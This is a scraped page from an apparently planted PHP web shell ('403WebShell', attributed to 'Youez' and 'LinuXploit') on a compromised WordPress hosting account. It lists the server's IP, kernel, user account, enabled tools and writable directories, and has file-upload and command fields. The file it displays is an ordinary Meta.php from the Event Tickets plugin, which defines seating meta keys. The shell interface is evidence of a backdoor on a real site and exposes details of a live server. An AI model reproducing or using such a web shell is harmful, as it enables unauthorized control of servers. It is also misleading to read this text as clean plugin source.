Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.146.255.161
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/misswavenigeria.com/wp-content/plugins/event-tickets/src/Tickets/Seating/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/misswavenigeria.com/wp-content/plugins/event-tickets/src/Tickets/Seating/Meta.php
<?php
/**
 * Information repository and handler of post meta data for the plugin.
 *
 * @since 5.16.0
 *
 * @package TEC\Controller;
 */

namespace TEC\Tickets\Seating;

/**
 * Class Meta.
 *
 * @since 5.16.0
 *
 * @package TEC\Controller;
 */
class Meta {
	/**
	 * The meta key used to store the enabled state of seat layouts and reservations for a post.
	 *
	 * @since 5.16.0
	 *
	 * @var string
	 */
	public const META_KEY_ENABLED = '_tec_slr_enabled';

	/**
	 * The meta key used to store the layout ID of a post.
	 *
	 * @since 5.16.0
	 *
	 * @var string
	 */
	public const META_KEY_LAYOUT_ID = '_tec_slr_layout';

	/**
	 * The meta key used to store the seat type of a Ticket.
	 *
	 * @since 5.16.0
	 *
	 * @var string
	 */
	public const META_KEY_SEAT_TYPE = '_tec_slr_seat_type';

	/**
	 * The meta key used to store the UUID of a post.
	 *
	 * @since 5.16.0
	 *
	 * @var string
	 */
	public const META_KEY_UUID = '_tec_slr_uuid';

	/**
	 * The meta key used to store the seat labels of a Ticket as attendee meta.
	 *
	 * @since 5.16.0
	 *
	 * @var string
	 */
	public const META_KEY_ATTENDEE_SEAT_LABEL = '_tec_slr_seat_label';

	/**
	 * The meta key used to store the reservation ID of an attendee.
	 *
	 * @since 5.16.0
	 *
	 * @var string
	 */
	public const META_KEY_RESERVATION_ID = '_tec_slr_reservation_id';
}

Youez - 2016 - github.com/yon3zu
LinuXploit